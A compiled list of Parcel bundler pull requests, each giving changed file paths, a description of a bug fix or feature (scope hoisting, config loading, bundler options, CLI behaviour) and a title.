packages/core/integration-tests/test/integration/scope-hoisting/commonjs/mutated-exports-object/index.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/mutated-exports-object/mutates.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/mutated-exports-object/value.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/link.js
Collaboration with @wbinnssmith and ideas from @devongovett 
```js
// index.js
const v = require("./value");
v.foo = 2;
console.log(v.foo);
// value.js
exports.foo = 1;
```
would previously result in (shaken statements commented out)
```js
// ---- value.js
// var $value$exports = {};
var $value$export$foo = 2;
// $value$exports.foo = $value$export$foo;
// ---- index.js
// $value$exports.foo = 1;
console.log($value$export$foo);
```
The new behaviour is:
```js
// ---- value.js
// var $value$exports = {};
var $value$export$foo = 2;
// $value$exports.foo = $value$export$foo;
// ---- index.js
$value$exports$foo = 1;
// $value$exports.foo = 1;
console.log($value$export$foo);
```
(Terser will collapse the two assignments)
=> Apply CommonJS exports.foo assignments

packages/core/integration-tests/test/eslint-validation.js, packages/core/integration-tests/test/integration/eslint-parse-error/.eslintrc.json, packages/core/integration-tests/test/integration/eslint-parse-error/index.js, packages/validators/eslint/src/EslintValidator.js
Closes https://github.com/parcel-bundler/parcel/issues/4605
eslint sets `endLine` and `endColumn` to `undefined` on a parser error. This caused no highlights to be displayed in the printed codeframe (see linked issue).
=> eslint validator: display hightlights for parse error

packages/core/core/src/BundlerRunner.js, packages/core/core/src/PackagerRunner.js, packages/core/core/src/Parcel.js, packages/core/core/src/applyRuntimes.js, packages/core/core/src/public/BundleGraph.js, packages/core/core/src/public/MutableBundleGraph.js, packages/core/test-utils/src/utils.js, packages/core/types/index.js, packages/core/utils/src/generateBuildMetrics.js, packages/core/utils/src/relativeBundlePath.js, packages/core/utils/src/replaceBundleReferences.js, packages/packagers/html/src/HTMLPackager.js, packages/packagers/js/src/JSPackager.js, packages/reporters/bundle-analyzer/src/BundleAnalyzerReporter.js, packages/reporters/cli/src/bundleReport.js, packages/reporters/dev-server/src/Server.js, packages/runtimes/js/src/JSRuntime.js, packages/shared/scope-hoisting/src/concat.js, packages/shared/scope-hoisting/src/formats/commonjs.js, packages/shared/scope-hoisting/src/formats/esmodule.js, packages/shared/scope-hoisting/src/formats/global.js, packages/shared/scope-hoisting/src/generate.js, packages/shared/scope-hoisting/src/link.js, packages/shared/scope-hoisting/src/types.js, packages/shared/scope-hoisting/src/utils.js
This allows the public `BundleGraph` to be constructed with a given Bundle factory, and makes the `BundleGraph` polymorphic on anything that implements `IBundle`, allowing the public `BundleGraph` to return either `Bundle`s or `NamedBundle`s.
The `MutableBundleGraph` only returns `Bundle`s for now, as that is all that is needed.
This allows namers to receive `BundleGraph<Bundle>` — an immutable BundleGraph that produces unnamed `Bundle`s — and things like runtimes and packagers to receive `BundleGraph<NamedBundle>`, a BundleGraph which produces `NamedBundle`s
As a simplification, this removes the caching behavior for re-using public BundleGraph wrappers. These are not created at the rate of other public wrappers, and I believe that the way we pass them to plugins, they don't really …
=> Make BundleGraph parameterized on a particular Bundle type

packages/core/core/src/assetUtils.js, packages/core/integration-tests/test/integration/postcss-config-package/package.json, packages/core/integration-tests/test/integration/postcss-config-package/style.css, packages/core/integration-tests/test/postcss.js, packages/core/utils/src/config.js, packages/core/utils/src/index.js
Closes https://github.com/parcel-bundler/parcel/issues/4603
The lesson here: `any` (`= ConfigResult`) is bad.
Having a `postcss` object as config in `package.json`
=> Fix `getConfig` with `packageKey`

packages/core/integration-tests/test/integration/scope-hoisting/es6/export-before-declaration/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/export-before-declaration/b.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/hoist.js
Closes #4594
The `exports.foo = foo` assignment was inserted after the `ExportDeclaration`, not the `VariableDeclaration`.
```js
import * as o from "./other.js";
console.log(o);
// other.js
export {x};
const x = 2;
```
Previous output:
```js
(function () {
// ASSET: /app/src/other.js
var $ddb4d6c67f65e26420a93ba58f2a194$exports = {};
$ddb4d6c67f65e26420a93ba58f2a194$exports.x = $ddb4d6c67f65e26420a93ba58f2a194$export$x;
const $ddb4d6c67f65e26420a93ba58f2a194$export$x = 2;
console.log($ddb4d6c67f65e26420a93ba58f2a194$exports);
})();
```
Now:
Previous output:
```js
(function () {
// ASSET: /app/src/other.js
var $ddb4d6c67f65e26420a93ba58f2a194$exports = {};
const $ddb4d6c67f65e26420a93ba58f2a194$export$x = 2;
$ddb4d6c67f65e26420a93ba58f2a194$exports.x = …
```
=> Named export before decl generated wrong assignment order

packages/core/integration-tests/test/integration/scope-hoisting/es6/side-effects-false-wrap-excluded/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/side-effects-false-wrap-excluded/node_modules/bar/foo.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/side-effects-false-wrap-excluded/node_modules/bar/index.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/side-effects-false-wrap-excluded/node_modules/bar/other.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/side-effects-false-wrap-excluded/node_modules/bar/package.json, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/concat.js
We don't need to wrap sideeffect-free assets (right?), because the whole point of wrapping is not causing sideeffects.
This has two benefits:
- (Smaller output, maybe faster build?)
- In the added test case
`app -conditional import-> lodash-es/lodash.js -reexports-> lodash-es/first.js -reexports-> lodash-es/head.js`,
`lodash-es/first.js` was excluded in concat but the init call for that assets was still generated. Now, we never wrap sideeffect-free asssets, so when an asset is excluded there will never be a dangling init call.
=> Never wrap sideEffect free assets

flow-libs/fs-write-stream-atomic.js.flow, packages/core/core/src/PackagerRunner.js, packages/core/fs/package.json, packages/core/fs/src/MemoryFS.js, packages/core/fs/src/NodeFS.js, packages/core/is-v2-ready-yet/package.json, packages/dev/eslint-config/package.json, packages/dev/eslint-plugin/src/rules/no-self-package-imports.js, yarn.lock
Rather than implement this ourselves, use fs-write-stream-atomic [0] to atomically write streams to the filesystem in NodeFS. Resolves #4614. May resolve #4495 (cc @mischnic @sdjnes @Banou26)
It currently uses a modified version of `fs-write-stream-atomic` to provide safety across worker threads when applicable. This change has been submitted upstream [1] but this PR currently relies on a fork of the package [2].
Test Plan: 
* `yarn flow check && yarn test`
* Build the kitchen sink example and verify no failures (such as from errors re: renaming files in the disk cache)
[0] https://github.com/npm/fs-write-stream-atomic
[1] https://github.com/npm/fs-write-stream-atomic/pull/22
[2] https://github.com/parcel-bundler/parcel/blob/f69399aa6c8ce3793dce0467747e465996975e0c/packages/core/fs/package …
=> Use fs-write-stream-atomic to write atomic fs streams

packages/core/core/src/ParcelConfig.schema.js, packages/core/core/test/loadParcelConfig.test.js
Allow `@babel/parcel-transformer` or `@prefresh/parcel-config`.
Closes T-498
The readme was already correct
=> Allow plugins like `@org/parcel-${type}`

packages/core/core/package.json, packages/core/integration-tests/test/css.js, packages/core/integration-tests/test/sourcemaps.js, packages/core/utils/package.json, packages/core/utils/src/generateBuildMetrics.js, packages/optimizers/cssnano/package.json, packages/optimizers/terser/package.json, packages/packagers/css/package.json, packages/packagers/js/package.json, packages/reporters/cli/src/bundleReport.js, packages/shared/babel-ast-utils/package.json, packages/shared/scope-hoisting/package.json, packages/transformers/coffeescript/package.json, packages/transformers/css/package.json, packages/transformers/less/package.json, packages/transformers/sass/package.json, packages/transformers/typescript-types/package.json, yarn.lock
This PR rewrites the build report utility slightly to include an `unknown-origin` dummy asset to highlight mappings that have no source. This mainly happens when adding in additional data into an ast as these do not originate from a specific file.
This also solves the issue where some assets are larger than the complete bundle by normalising paths and making sure once it's a sourcemap based bundlereport we only care about the sources in the sourcemap and don't use sizes from the original assets as a reference.
This has been discovered by @mischnic in the ReactHN benchmark
With scope-hoisting
Without scope-hoisting
=> add an unknown-origin asset to add mappings that have no defined source

.gitignore, packages/core/core/src/ParcelConfig.js, packages/core/core/src/loadParcelConfig.js, packages/core/core/src/types.js
Closes T-462
```json
{
"extends": "@parcel/config-default",
"transformers": {
"*.{js,mjs,jsm,jsx,es6,cjs,ts,tsx}": [
"@prefresh/parcel-transformer-preact-refresh-babel",
"...",
"@prefresh/parcel-transformer-preact-refresh-wrap"
]
},
"runtimes": {
"browser": ["...", "@prefresh/parcel-runtime-preact-refresh"]
}
}
```
=> Don't crash on `...` in `runtimes`

packages/core/core/src/PackagerRunner.js, packages/core/integration-tests/test/sourcemaps.js, packages/transformers/css/src/CSSTransformer.js, packages/transformers/postcss/src/PostCSSTransformer.js
Closes #4714
1. Use `__parcel_source_root` only when on `serve`
2. Make the tests use the actual sourceroot in the tests, I had to update the css sourcemap generation so that `sources` is always relative to the project root
=> Use `__parcel_source_root` only when `serve`ing

packages/core/integration-tests/test/integration/pnp-builtin/.pnp.js, packages/core/integration-tests/test/integration/pnp-builtin/index.js, packages/core/integration-tests/test/integration/pnp-builtin/local.js, packages/core/integration-tests/test/integration/pnp-builtin/pnp/module/index.js, packages/core/integration-tests/test/pnp.js, packages/utils/node-resolver-core/src/NodeResolver.js
This forces using the npm package "assert" instead of the Node builtin: `import assert from "assert/"`;
(Used in `node-libs-browser`)
https://github.com/parcel-bundler/parcel/discussions/4762
=> PnP: Support importing builtins from npm with `assert/`

packages/core/core/src/loadParcelConfig.js, packages/core/core/test/loadParcelConfig.test.js, packages/core/integration-tests/test/integration/typescript-types-parcelrc/.parcelrc, packages/core/integration-tests/test/integration/typescript-types-parcelrc/index.ts, packages/core/integration-tests/test/integration/typescript-types-parcelrc/package.json, packages/core/integration-tests/test/typescript-tsc.js
The entry asset for `types: "dist/index.d.ts"` was being transformed with the `*.ts` pipeline in a custom parcelrc.
Closes #4666:
Only happens with a custom parcelrc that overrides the `ts` pipeline because when determining the pipeline for `types:index.ts`, the custom parcelrc takes precedence and it is processed like any other ts asset.
The current logic is:
1. select pipeline with matching named pipeline and type
2. otherwise select pipeline with matching type
3. otherwise continue search in parent config
Should be:
1. select pipeline with matching named pipeline and type
2. otherwise select pipeline with matching named pipeline and type in nearest parent config
3. otherwise select pipeline with matching type in current config
4. otherwise select pipeline with matching type in nearest …
=> Named pipelines should have precedence to other pipelines

packages/core/integration-tests/test/html.js, packages/core/integration-tests/test/integration/html-multi-entry/a.html, packages/core/integration-tests/test/integration/html-multi-entry/b.html, packages/core/integration-tests/test/integration/html-multi-entry/index.js, packages/core/utils/src/replaceBundleReferences.js
This PR fixes a bug in `replaceURLReferences` where it sometimes returns a reference to an incorrect bundle as it does not actually use the entryBundle.
Thanks @mischnic for mentioning bundle_group has an entryAssetId
See #4772 for context
Fixes #4772
=> Fix html referencing wrong bundle

packages/core/integration-tests/test/integration/ts-types/externals/expected.d.ts, packages/core/integration-tests/test/integration/ts-types/externals/index.tsx, packages/transformers/typescript-types/src/collect.js, packages/transformers/typescript-types/src/shake.js
Fixes three small issues in the TS types transformer:
* Crash when `node.modifiers` was not set on a variable declaration node
* Incorrect handling of default imports
* Broken when both a default and named import were on the same node
=> Bugfixes for TS types transformer

packages/core/integration-tests/test/integration/ts-types/exporting/expected.d.ts, packages/core/integration-tests/test/integration/ts-types/exporting/index.ts, packages/core/integration-tests/test/integration/ts-types/exporting/message.ts, packages/core/integration-tests/test/integration/ts-types/exporting/test.ts, packages/transformers/typescript-types/src/TSModuleGraph.js, packages/transformers/typescript-types/src/collect.js, packages/transformers/typescript-types/src/shake.js
Fixes #4611. TypeScript has a separate AST node type for the `export default expression` form, which we weren't handling. In addition, there were some errors with the way we handled re-exporting default.
=> Fix export assignments in ts types transformer

packages/transformers/svg-react/src/SvgReactTransformer.js
This makes the SVG to react transformer output JSX instead of JS. This means you don't need to configure babel to handle JSX because we automatically do that for assets of type JSX.
=> Treat SVG to react transform as JSX instead of JS

packages/core/parcel/src/cli.js
This PR is to avoid the following issue when setting a port with env:
``` bash
TypeError: (options.port || []).reduce is not a function
at getPort (/home/sant821/Desktop/testing-parcel/node_modules/get-port/index.js:23:30)
at module.exports (/home/sant821/Desktop/testing-parcel/node_modules/get-port/index.js:32:2)
at normalizeOptions (/home/sant821/Desktop/testing-parcel/node_modules/parcel/lib/cli.js:251:18)
at Command.run (/home/sant821/Desktop/testing-parcel/node_modules/parcel/lib/cli.js:133:23)
at Command.listener (/home/sant821/Desktop/testing-parcel/node_modules/commander/index.js:315:8)
at Command.emit (events.js:315:20)
at Command.parseArgs (/home/sant821/Desktop/testing-parcel/node_modules/commander/index.js:651:12)
at Command.parse …
```
=> Parses process.env.PORT to a number

packages/bundlers/default/package.json, packages/bundlers/default/src/DefaultBundler.js, packages/core/core/src/BundlerRunner.js, packages/core/integration-tests/test/integration/shared-many/package.json, packages/core/types/index.js, packages/core/utils/src/schema.js
Depends on #4786.
This changes the default options for the bundler to optimize for HTTP/2. In particular, it raises the number of parallel requests allowed from 6 to 25, and lowers the minimum bundle size from 30kb to 20kb. This should allow more granular caching while keeping good performance for apps served with HTTP/2. This is based on the work the Chrome team did with the Next.js team on more granular chunking. See https://web.dev/granular-chunking-nextjs/.
Since HTTP/2 is very widely supported by all browsers and most CDNs/servers, we believe that this is a good default. However, if you are still using HTTP/1.1, or otherwise wish the change these thresholds, you can now configure the bundler. This is done through the package.json in the project root.
This will use the default options …
=> Optimize for HTTP/2 by default and support configuring bundler options

packages/bundlers/default/src/DefaultBundler.js, packages/core/integration-tests/test/html.js, packages/core/integration-tests/test/integration/shared-sibling-entries/a.html, packages/core/integration-tests/test/integration/shared-sibling-entries/b.html, packages/core/integration-tests/test/integration/shared-sibling-entries/c.html, packages/core/integration-tests/test/integration/shared-sibling-entries/other.css
This fixes an issue introduced in #4449, now that the same bundle object can be returned when the bundle id is the same: https://github.com/parcel-bundler/parcel/pull/4449/files#diff-4c49ed02ff34648c2aae9667d844bfc1R138.
The same asset may be revisited multiple times when creating sibling bundles, e.g. CSS imported from multiple JS files. Now that the same bundle object is returned, the `bundleRoots` map was getting overwritten. The bundler now needs to check for this case.
=> Fix reused sibling bundles

packages/core/fs/package.json, packages/core/parcel-bundler/package.json, yarn.lock
This PR updates the watcher so that the next nightly will no longer have the watcher with the segmentation fault crash.
=> Update watcher dependency to 2.0.0-alpha.8

packages/core/integration-tests/test/css.js, packages/core/integration-tests/test/html.js, packages/core/integration-tests/test/integration/data-url/img.svg, packages/core/integration-tests/test/javascript.js, packages/optimizers/data-url/src/DataURLOptimizer.js
Fixies https://github.com/parcel-bundler/parcel/issues/4872
Following svg that include characters "-_.!~*'()" that [`encodeURIComponent`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/encodeURIComponent) does not escape can be encoded 
to be rendered on browsers properly.
```svg
<svg width="120" height='120' xmlns="http://www.w3.org/2000/svg">
<filter id="blur-_.!~*">
<feGaussianBlur stdDeviation="5"/>
</filter>
<circle cx="60" cy="60" r="50" fill="green" filter="url(#blur-_.!~*)" />
</svg>
```
=> make optimizer-data-url encode "!'()*"

packages/core/core/src/requests/PathRequest.js, packages/core/integration-tests/test/globals.js, packages/core/integration-tests/test/integration/global-alias/index.js, packages/core/integration-tests/test/integration/global-alias/package.json, packages/utils/node-resolver-core/src/NodeResolver.js
Adds support for globals using the `alias` in `package.json`.
Based off of #4846 and #4850.
Fixes #3305.
In `package.json`:
```json
{
"alias": {
"react": { "global": "React" },
"myAliasedPackageName": { "fileName": "./myPkg.js" },
"finalPackage": "finalPackage.js"
}
}
```
All of the above syntax forms work, for globals and normal aliases respectively. <strike>The pure string syntax works less reliably because it has to guess that it's not an alias based on whether or not the file exists.</strike> (Removed)
=> Add globals support

packages/core/core/src/BundleGraph.js, packages/core/core/src/assetUtils.js, packages/core/core/src/public/Asset.js, packages/core/core/src/public/BundleGraph.js, packages/core/core/src/types.js, packages/core/core/test/BundleGraph.test.js, packages/core/integration-tests/test/javascript.js, packages/core/integration-tests/test/react-refresh.js, packages/core/integration-tests/test/scope-hoisting.js, packages/core/test-utils/src/utils.js, packages/core/types/index.js, packages/packagers/js/src/JSPackager.js, packages/reporters/dev-server/src/HMRServer.js, packages/runtimes/js/src/JSRuntime.js, packages/shared/scope-hoisting/src/formats/global.js, packages/shared/scope-hoisting/src/generate.js, packages/shared/scope-hoisting/src/link.js, packages/shared/scope-hoisting/src/types.js
The BundlerRunner (calling `InternalBundleGraph.fromAssetGraph`) mutated the asset value objects by setting their `publicId`. When a cached bundle graph was used, the assets weren't mutated and the `publicId` was null.
https://github.com/parcel-bundler/parcel/blob/131e9296aa1fdebdb4cccbf90d3ab0ae82934674/packages/core/core/src/BundlerRunner.js#L83-L94
This manifested in the HMR reporter crashing because every other component also used a cached result (e.g. packager) and so `asset.publicId` was never actually accessed.
Instead use the existing map in the bundle graph to get an assets's public id.
Fixes https://github.com/parcel-bundler/parcel/issues/4860
Related: #4449
=> Access asset publicId via the bundle graph

packages/core/core/src/public/PluginOptions.js, packages/core/core/src/resolveOptions.js, packages/core/core/src/types.js, packages/core/core/test/test-utils.js, packages/core/types/index.js, packages/namers/default/src/DefaultNamer.js, packages/optimizers/htmlnano/src/HTMLNanoOptimizer.js, packages/optimizers/terser/src/TerserOptimizer.js, packages/reporters/cli/test/CLIReporter.test.js, packages/utils/node-resolver-core/src/NodeResolver.js
This updates ParcelOptions/PluginOption's `rootDir` property to be named `entryRoot`, which better describes what it represents. It should also make clear when projectRoot might be a more appropriate choice.
This also updates the node resolver (when looking up aliases and resolving `/` and `~`) to use projectRoot.
This also updates the terser optimizer to resolve its config from the `entryRoot`, like the htmlnano optimizer.
=> rootDir => entryRoot

packages/core/core/src/resolveOptions.js, packages/core/integration-tests/test/babel.js, packages/core/integration-tests/test/postcss.js, packages/core/package-manager/src/NodePackageManager.js, packages/core/package-manager/test/NodePackageManager.test.js, packages/core/parcel/src/cli.js
Only enable autoinstall when explicitly enabled when using `packageManager.resolve`, currently when passing undefined and null it also autoinstalls, which might be a problem with third party plugins.
This PR also disabled autoinstall completely when using the build command as this command should probably be reliable across machines (especially build pipelines and CI/CD)
Slightly related to #2978
=> Tweak autoinstall behaviour

packages/core/core/src/BundleGraph.js, packages/core/core/src/Graph.js
This encapsulates the AdjacencyList structure and functionality in a class. This removes (or rather centralizes) a lot of the null checking introduced by #4906 and exposes more purpose-oriented methods rather than having the user understand how it is internally structured.
Some of the methods still return Maps and Sets. `getListMap` returns the underlying structure, which is needed for serialization, but all other methods return read-only structures which are enforced by flow but not are read-only at runtime.
=> Encapsulate AdjacencyList in class

packages/core/core/src/Transformation.js
Fixes #4929 
Includes the pipeline specifier (i.e. `types:`, `template:`, etc.) in the cache key for a transformer so that the results aren't mixed up.
Apparently, Parcel thought that `template:App.vue` could reuse the asset from `App.vue` because they had the same cache key. This caused a circular dependency and therefore a broken build in the Vue transformer. This didn't fail in tests because caching was disabled. I think that tests should use caching to prevent bugs like this in the future.
=> Include pipeline in cache key

packages/core/parcel/README.md
It looks like the `--dist-dir` CLI option is not documented in the README, and since this option changed from `out-dir` in V1 I think it makes sense to add this to the README in V2.
=> update readme to include dist-dir documentation

packages/core/parcel-bundler/src/transforms/posthtml.js, packages/packagers/html/src/HTMLPackager.js, packages/transformers/posthtml/src/PostHTMLTransformer.js
Allow passing config to posthtml-render to control HTML rendering.
```
"posthtml-render": { quoteAllAttributes: false },
```
This option would allow your HTML to be smaller and easier to read. However this change is generic and provides access to any posthtml-render options.
- Add a "posthtml-render" property to `package.json` and see the effect.
- Create a `posthtml-render.config.js` file and see the effect.
=> Allow passing config to posthtml-render to control HTML rendering.

packages/core/workers/src/Worker.js
This is a fix for issue #4795. Parcel 2 runs out of memory building large code bases. Normally you can pass the `--max-old-space-size=...` flag to node to increase the memory ceiling for node programs, but this doesn't work with Parcel because passing this flag causes Parcel to crash.
The crash looks like this:
```
$ npm install parcel
$ touch empty.js
$ node --max-old-space-size=8192 node_modules/.bin/parcel empty.js
Error [ERR_WORKER_INVALID_EXEC_ARGV] Initiated Worker with invalid execArgv flags: --max-old-space-size=8192
at new Worker (internal/worker.js:134:13)
...
```
This change prevents the crash.
I ran this command inside the Parcel repo to test this change:
```
yarn build && NODE_ENV=test node --max-old-space-size=8192 node_modules/.bin/mocha
```
This command fails without my …
=> Avoid crash when "--max-old-space-size" is present

packages/core/integration-tests/test/integration/scope-hoisting/commonjs/this-arrow-function/a.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/this-arrow-function/b.js, packages/core/integration-tests/test/integration/scope-hoisting/commonjs/this-arrow-function/package.json, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/hoist.js
Closes #4851
Testing `!path.scope.parent` when determining whether to replace `this` in the hoist transformer isn't adequate because arrow function have a scope but still use the parent scope's `this`, so instead check whether there is a non-arrow function in the scope's ancestry.
=> Also replace this for top-level arrow functions

packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-increment-object/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/tree-shaking-increment-object/b.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/utils.js, yarn.lock
Closes #5025
`UpdateExpressions` (e.g. `counter++`) are listed in both `referencePaths` and `constantViolations`, remove `return` to check for their existence in both lists
=> Fix shaking of increment expressions

packages/core/parcel-bundler/src/utils/lineCounter.js
npm build throws error with empty string in lineCounter 
similar to #4691
Cannot read property 'length' of undefined
at lineCounter (..\node_modules\parcel-bundler\src\utils\lineCounter.js:4:30)
at JSPackager.writeModule (..\node_modules\parcel-bundler\src\packagers\JSPackager.js:127:60)
at async JSPackager.addAsset (..\node_modules\parcel-bundler\src\packagers\JSPackager.js:88:5)
at async Bundle._addDeps (..\node_modules\parcel-bundler\src\Bundle.js:250:5)
at async Bundle._package (..\node_modules\parcel-bundler\src\Bundle.js:219:7)
at async Promise.all (index 0)
at async Bundle.package (..\node_modules\parcel-bundler\src\Bundle.js:202:5)
at async Bundler.bundle (..\node_modules\parcel-bundler\src\Bundler.js:325:27)
=> lineCounter with empty string

packages/core/parcel/src/cli.js
This implements better exit status codes when using watch-type development modes (watch, serve). It:
* In watch modes, causes Parcel to exit with a success (0) code when a SIGINT-style ctrl-c is detected
* In build mode, causes Parcel to exit with a code (130) that is normally used when SIGINT is received [0]
* Notes in a comment why we exit with 0 when receiving SIGINT and SIGTERM in watch modes
* Notes in a comment why we enqueue the shutdown message in a timeout
Test Plan:
* Add a timeout sleep to Parcel.js to suspend the app for easier testing
* Run `parcel build`, press ctrl-c, and verify it exits with a code of 130.
* Run `parcel build`, send a SIGINT to the process, and verify it exits with a code of 130.
* Run `parcel build`, send a SIGTERM to the process, and verify it exits with …
=> Exit with better status codes in watch modes

CHANGELOG.md, packages/core/integration-tests/data/lastTestRun.json, packages/core/integration-tests/test/sourcemaps.js, packages/core/parcel-bundler/src/Parser.js, packages/core/parcel-bundler/src/assets/SASSAsset.js
Fixes #5147 
Some places this was already correct, but not all. Now it's consistently "Sass".
=> rename SASS → Sass

packages/bundlers/default/src/DefaultBundler.js, packages/core/core/src/BundleGraph.js, packages/core/core/src/public/MutableBundleGraph.js
This removes BundleGroups when their main bundle is removed from the graph.
Test Plan:
=> Remove bundlegroups when their entry bundles are removed

packages/core/utils/src/resolve.js, packages/utils/node-resolver-core/src/NodeResolver.js
Previously, if some error in the node resolver occurred (e.g. something like `The "path" argument must be of type string. Received null`, so an actual bug), the error would be swallowed and the message would instead just be `Cannot resolve dependency ...`
=> Don't swallow resolver error

packages/shared/scope-hoisting/package.json, packages/transformers/js/package.json, packages/transformers/react-refresh-wrap/package.json, yarn.lock
The `%%something%%` style placeholders are only supported in `@babel/template@^7.4.0`. Only the React Fast Refresh transformer used this syntax, but I've bumped the range in every package.
Closes https://github.com/parcel-bundler/parcel/issues/5185
=> Bump version range for  `@babel/template`

flow-libs/babel-parser.js.flow, packages/core/integration-tests/package.json, packages/core/integration-tests/test/integration/dynamic-import-attributes/.babelrc, packages/core/integration-tests/test/integration/dynamic-import-attributes/async.js, packages/core/integration-tests/test/integration/dynamic-import-attributes/async2.js, packages/core/integration-tests/test/integration/dynamic-import-attributes/index.js, packages/core/integration-tests/test/integration/dynamic-static-prefetch/.babelrc, packages/core/integration-tests/test/integration/dynamic-static-prefetch/async.js, packages/core/integration-tests/test/integration/dynamic-static-prefetch/index.js, packages/core/integration-tests/test/integration/dynamic-static-prefetch/prefetched.js, packages/core/integration-tests/test/integration/dynamic-static-preload/.babelrc, packages/core/integration-tests/test/integration/dynamic-static-preload/async.js, packages/core/integration-tests/test/integration/dynamic-static-preload/index.js, packages/core/integration-tests/test/integration/dynamic-static-preload/preloaded.js, packages/core/integration-tests/test/javascript.js, packages/core/test-utils/src/utils.js, packages/examples/kitchen-sink/src/async.js, packages/examples/kitchen-sink/src/prefetched.js, packages/examples/kitchen-sink/src/preloaded.js, packages/runtimes/js/src/JSRuntime.js, packages/runtimes/js/src/cacheLoader.js, packages/runtimes/js/src/loaders/browser/prefetch-loader.js, packages/runtimes/js/src/loaders/browser/preload-loader.js, packages/transformers/js/src/visitors/dependencies.js, yarn.lock
This implements declarative bundle preloading and prefetching in JavaScript using import attributes[0], which is a Stage 2 JavaScript feature.
Usage:
```js
import('./preloaded', {preload: true});
```
or 
```js
import('./prefetched', {prefetch: true});
```
Effect: When a bundle _A_ containing `import(B, {prefetch: true})` is requested (in global mode a `script` tag for _A_ is added to the page), a `link` tag with `rel="prefetch"` for _B_ is also added to the page at the same time.
In the future, we could consider allowing setting the `as` priority or `media` constraints through these import attributes as well, which would get added as attributes on the `link` tag.
**Question:** Should we prefix or nest these attributes as to not interfere with formalized, standardized keys?
---
It does so …
=> Bundle preloading/prefetching

packages/core/integration-tests/test/html.js, packages/core/integration-tests/test/integration/html-svg-local-symbol/index.html, packages/transformers/html/src/dependencies.js
add test case to cover case of local symbols
Parcel have failed when referenced local SVG symbols via `<use xlink:href="#sth"></use>` (more explanation in the bug report - #5175).
**Added only integration test, please give me a sign, if it's needed from me to add anything else to this PR** (ping @mischnic)
Now the bundler correctly ignores paths starting with a hash (id references), for example:
```html
<svg xmlns:xlink="http://www.w3.org/1999/xlink">
<use xlink:href="#logotype" href="#logotype"></use>
</svg>
```
In the examples.
=> fix: svg use referencing local symbol via id

packages/transformers/pug/src/PugTransformer.js
Pretty self-explanatory: this lets users pass arbitrary options from `.pugrc`, etc., to Pug, instead of only whitelisting a subset of them.
```js
module.exports = {
plugins: [require('my-custom-pug-plugin')],
};
```
=> Forward extra properties from pug config to pug

packages/core/core/src/BundleGraph.js
Currently `BundleGraph.getHash(bundle)` does not incorporate the input bundle's name or id so bundles with different ids/names can end up using the same cache entries if they contain the same assets. This becomes a problem when the cache entries contain a sourcemap url which only applies to one of the bundles. If the bundle that created the cache entry no longer exists in a subsequent build or in a completely separate build and the sourcemap url contains a hashReference, then the build will fail with `Cannot read property 'hashReferences' of undefined` because it is trying to look up the final bundle hash of a bundle that doesn't exist in the build.
A quick and safe fix is to add the bundle id to the cache key, which I've done in this PR. This may be more aggressive than necessary in some …
=> Add bundle id to bundle hash

packages/core/integration-tests/test/integration/scope-hoisting/es6/export-named-empty/a.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/hoist.js
Previously, `export {};` wasn't removed in the hoist transformer and left inside the IIFE in the output bundle....
```
@parcel/optimizer-terser: "Export" statement may only appear at the top level
4235 | resolve(i18nProvider.changeLocale(newLocale))}).then(function(){stopLoading();setLocale(newLocale)}).catch(function(error){stopLoading();notify("ra.notification.i18n
> 4236 | export{};$ec2d257ced52b65e7a10db54dcc6764c$init();var $f9a9e0598a100fcf59a6afbb1230d76c$export$default=function(records){return records.reduce(function(values,record
>      | ^ "Export" statement may only appear at the top level
```
=> Strip empty export named

packages/core/integration-tests/test/integration/scope-hoisting/es6/re-export-namespace-order/index.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/re-export-namespace-order/library/a.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/re-export-namespace-order/library/b.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/re-export-namespace-order/library/index.js, packages/core/integration-tests/test/integration/scope-hoisting/es6/re-export-namespace-order/library/package.json, packages/core/integration-tests/test/integration/scope-hoisting/es6/re-export-namespace-order/other.js, packages/core/integration-tests/test/scope-hoisting.js, packages/shared/scope-hoisting/src/concat.js, packages/shared/scope-hoisting/src/hoist.js
Closes https://github.com/parcel-bundler/parcel/issues/4667
```js
// entry
import {b} from "./lib
```
```js
// lib.js
export * from "./a";
export { b } from "./b";
```
The order of `$parcel$require` calls in `lib.js` was reversed compared to the order in the graph (and the original order).
The concat order in the postorder traversal is based on these require calls and the result was:
```
entry
|- b
|- a
|- shared dependency of a & b
```
instead of 
```
entry
|- a
|- shared dependency of a & b
|- b
```
Using a value exported by a shared dependency of `a` and `b` would throw or just be undefined.
=> Fix concat order of namespace reexports and named reexports

packages/core/integration-tests/test/integration/formats/conflict-global/index.js, packages/core/integration-tests/test/integration/formats/conflict-global/package.json, packages/core/integration-tests/test/output-formats.js, packages/shared/scope-hoisting/src/formats/commonjs.js, packages/shared/scope-hoisting/src/formats/esmodule.js
Closes https://github.com/parcel-bundler/parcel/issues/4849
Previously, 
```js
const Foo = 2;
console.log(Map);
export { Foo as Map };
```
was failing because it tried to rename the `Map` binding (because `scope.hasBinding()` returned true).
After fixing that, the output was 
```js
export const Map = 2;
console.log(Map);
```
We now pick a different name instead if `scope.hasGlobal(...)` is true (both for esm and cjs).
```js
const _Map = 2;
export { _Map as Map };
console.log(Map);
```
=> Output format name collision with global

packages/core/core/src/Transformation.js
Test Plan:
* Add a file with underscores in its path and give it an invalid sourcemap reference, also with underscores in its path.
* Run Parcel and verify that the message does not show by default. Clear the cache and verify that it does show the messages when run with --log-level verbose.
* Verify that when run again with --log-level verbose, the message does not contain italics.
